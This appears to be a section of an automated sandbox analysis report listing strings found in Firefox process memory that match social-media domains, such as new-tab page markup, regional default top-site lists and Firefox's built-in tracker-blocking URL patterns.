Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2839565999.000002BA5B5A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B88F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B82F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Failed to listen. Listener already attached.No callback set for this channel.devtools.performance.popup.feature-flagFailed to listen. Callback argument missing.@mozilla.org/network/protocol;1?name=defaultbrowser.urlbar.dnsResolveFullyQualifiedNames@mozilla.org/network/protocol;1?name=filereleaseDistinctSystemPrincipalLoaderresource://devtools/server/devtools-server.js^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPdevtools.performance.recording.ui-base-urldevtools/client/framework/devtoolsDevToolsStartup.jsm:handleDebuggerFlagdevtools.debugger.remote-websocketdevtools/client/framework/devtools-browserDevTools telemetry entry point failed: WebChannel/this._originCheckCallback@mozilla.org/uriloader/handler-service;1^([a-z+.-]+:\/{0,3})*([^\/@]+@).+get FIXUP_FLAGS_MAKE_ALTERNATE_URIFailed to execute WebChannel callback:browser.fixup.dns_first_for_single_words^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?get FIXUP_FLAG_FORCE_ALTERNATE_URI@mozilla.org/dom/slow-script-debug;1Unable to start devtools server on {9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Got invalid request to save JSON dataresource://devtools/shared/security/socket.jsJSON Viewer's onSave failed in 
startPersistencebrowser.fixup.domainsuffixwhitelist.https://mail.yahoo.co.jp/compose/?To=%sgecko.handlerService.defaultHandlersVersionhttps://mail.inbox.lv/compose?to=%sresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjsresource://gre/modules/DeferredTask.sys.mjs_injectDefaultProtocolHandlersIfNeededresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/FileUtils.sys.mjshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://poczta.interia.pl/mh/?mailto=%shttps://poczta.interia.pl/mh/?mailto=%s{c6cf88b7-452e-47eb-bdc9-86e3561648ef}@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/JSONFile.sys.mjs_finalizeInternal/this._finalizePromise<resource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/async-stream-copier;1resource://gre/modules/ExtHandlerService.sys.mjsextractScheme/fixupChangedProtocol<{33d75835-722f-42c0-89cc-44f328e56a86}http://www.inbox.lv/rfc2368/?value=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/network/file-input-stream;1@mozilla.org/uriloader/dbus-handler-app;1Can't invoke URIFixup in the content processScheme should be either http or httpsisDownloadsImprovementsAlreadyMigratedSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULL@mozilla.org/network/simple-stream-listener;1newChannel requires a single object argument@mozilla.org/network/input-stream-pump;1https://mail.yahoo.co.jp/compose/?To=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/scriptableinputstream;1Non-zero amount of bytes must be specifiedhttps://mail.yandex.ru/compose?mailto=%shttps://mail.inbox.lv/compose?to=%spdfjs.previousHandler.preferredActionpdfjs.previousHan
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_postUpdateProcessing - removing downloading patch because we installed a different patch before it finisheddownloading.UpdateService:_postUpdateProcessing - status is pending-elevate, but this is a silent startup, so the elevation window has been suppressed.Downloader:onStopRequest - notifying observers of error. topic: update-error, status: download-attempts-exceeded, downloadAttempts: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/AND bookmarked equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", 
"*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2800920930.000002BA56B76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div 
class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
